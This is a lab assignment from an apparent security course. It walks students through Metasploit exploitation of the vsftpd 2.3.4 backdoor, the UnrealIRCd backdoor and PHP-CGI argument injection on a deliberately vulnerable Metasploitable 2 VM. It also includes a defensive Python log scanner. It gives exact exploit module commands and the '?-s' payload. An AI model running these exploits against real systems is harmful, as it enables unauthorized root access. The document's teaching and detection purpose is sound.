Project 6: Metasploit v. Linux (15 points)

What You Need

  1. A Kali Linux machine, real or virtual
  2. The "Metasploitable 2" vulnerable Linux Server you prepared in a previous project

Setup

Start your Kali VM and log in as root with the password toor

Start your Metasploitable 2 VM and log in as msfadmin with the password msfadmin

Execute the ifconfig command on both machines and ping from one to the other. Make sure you get replies, as shown below.


Task 1: Exploiting vsftpd

In the previous project, Nmap found the FTP server "vsftpd 2.3.4" running on the Metasploitable 2 target.

In Kali, execute this command to open Metasploit.

msfconsole

At the "msf>" prompt, execute this command.

search vsftpd

As shown below, one exploit is found.

Execute these commands:

use exploit/unix/ftp/vsftpd_234_backdoor
show options

As shown below, the only required parameter is RHOST, the IP address of the target system.

Execute these commands, replacing the IP address with the IP address of your Metasploitable 2 VM.

set RHOST 172.16.1.190
exploit

As shown below, a command shell session opens. Execute the whoami command to see the reply root.

Capturing a Screen Image

Make sure the "Command shell session opened" message is visible, as shown above.

Capture a whole-desktop image and save it as "Proj 6a".

YOU MUST SEND IN A WHOLE-DESKTOP IMAGE FOR FULL CREDIT

In Kali, execute these commands to exit the shell and Metasploit.

exit
exit

Task 2: Exploiting Unreal IRCd

In the previous project, Nmap found the UnrealIRCd server listening on port 6667 on the Metasploitable 2 target.

In Kali, execute this command to open Metasploit.

msfconsole

At the "msf>" prompt, execute this command.

search unreal

As shown below, one exploit is found.

Execute these commands:

use exploit/unix/irc/unreal_ircd_3281_backdoor
show options

As shown below, the only required parameter is RHOST, the IP address of the target system.

Execute these commands, replacing the IP address with the IP address of your Metasploitable 2 VM.

set RHOST 172.16.1.190
exploit

As shown below, a command shell session opens. Execute the whoami command to see the reply root.

Capturing a Screen Image

Make sure the "Command shell session opened" message is visible, as shown above.

Capture a whole-desktop image and save it as "Proj 6b".

YOU MUST SEND IN A WHOLE-DESKTOP IMAGE FOR FULL CREDIT

Press Ctrl+C to cancel the session.

In Kali, execute these commands to exit the shell and Metasploit.

y
exit

Task 3: Exploiting PHP CGI Argument Injection

On your Kali VM, open Firefox and go to the IP address of your Metasploitable 2 VM.

A Web page opens, as shown below.

Click the phpMyAdmin link.

Append this to the end of the URL, and press Enter.

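?-s

The source code of the Web page appears, as shown below.

This is a known bug in PHP-CGI (CVE-2012-1823, listed in the Credits): a query string that contains no "=" is handed to php-cgi as command-line arguments, so -s is treated as the switch that displays the script's source. The same bug allows us to get remote code execution with Metasploit.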

In Kali, execute this command to open Metasploit.

msfconsole

At the "msf>" prompt, execute this command.

search php_cgi

As shown below, one exploit is found.

Execute these commands:

use exploit/multi/http/php_cgi_arg_injection
show options

As shown below, the only required parameter is RHOST, the IP address of the target system.

Execute these commands, replacing the IP address with the IP address of your Metasploitable 2 VM.

set RHOST 172.16.1.190
exploit

As shown below, a meterpreter session opens.

Troubleshooting

If you are using Kali 2017.2, this exploit fails, and you get the message "Meterpreter session closed ... reason: died", as shown below. This seems to be a bug in Kali. Just turn in that image and I'll accept it.

Execute these commands to see system information and your user ID. You are "www-data", which is a low-privilege account. To get root access, you need another exploit, as discussed here.

sysinfo
getuid

Capturing a Screen Image

Make sure the "Meterpreter session opened" message is visible, as shown above.

Capture a whole-desktop image and save it as "Proj 6c".

YOU MUST SEND IN A WHOLE-DESKTOP IMAGE FOR FULL CREDIT
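
Added example, not part of the original project: a Python check a defender could run over web server access logs to spot the request shape used in Task 3 (a query string with no unencoded "=" whose first argument starts with "-"). It assumes Apache combined-format logs; the function names and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Assumption: Apache "combined" log format. Capture client, request target, status.
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[[^\]]+\] '
    r'"[A-Z]+ (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)

def is_cgi_arg_injection(target):
    """True if the query string would reach a CGI binary as command-line
    arguments and the first argument looks like an option switch."""
    _path, sep, query = target.partition("?")
    if not sep or not query:
        return False
    # RFC 3875 section 4.4: only a query with no unencoded "=" becomes argv.
    if "=" in query:
        return False
    # Decode once so %2d and "+" (space) are seen the way the server sees them.
    decoded = unquote_plus(query)
    return decoded.lstrip().startswith("-")

def scan(lines):
    """Return (client, target, status) for every suspicious log line."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m and is_cgi_arg_injection(m.group("target")):
            hits.append((m.group("client"), m.group("target"), int(m.group("status"))))
    return hits

# Constructed sample log lines (documentation address range, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [12/Oct/2017:21:00:01 -0700] "GET /phpMyAdmin/ HTTP/1.1" 200 4145 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [12/Oct/2017:21:00:09 -0700] "GET /phpMyAdmin/?-s HTTP/1.1" 200 9120 "-" "Mozilla/5.0"',
    '192.0.2.11 - - [12/Oct/2017:21:00:15 -0700] "GET /phpMyAdmin/index.php?lang=en-utf-8 HTTP/1.1" 200 4145 "-" "Mozilla/5.0"',
    '192.0.2.12 - - [12/Oct/2017:21:00:20 -0700] "GET /phpMyAdmin/?%2ds HTTP/1.1" 200 9120 "-" "curl/7.55"',
    '192.0.2.12 - - [12/Oct/2017:21:00:24 -0700] "GET /phpMyAdmin/?+-s HTTP/1.1" 200 9120 "-" "curl/7.55"',
    '192.0.2.13 - - [12/Oct/2017:21:00:30 -0700] "GET /search.php?-q=test HTTP/1.1" 404 210 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for client, target, status in scan(SAMPLE_LOG):
        print(f"possible PHP-CGI argument injection: {client} {target} -> {status}")
```

A hit with status 200 on a PHP path is worth following up; on servers that do not run PHP through CGI the same request is harmless noise.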

Turning in Your Project

Email the images to cnit.124@gmail.com with a subject line of "Proj 6 From YOUR NAME", replacing "YOUR NAME" with your real name.

Send a Cc to yourself.

Credits

Exploiting VSFTPD v2.3.4 on Metasploitable 2

Hacking Unreal IRCd 3.2.8.1 on Metasploitable 2

CVE-2012-1823: PHP CGI

https://community.rapid7.com/docs/DOC-1875

Last Modified: 10-12-17 9 pm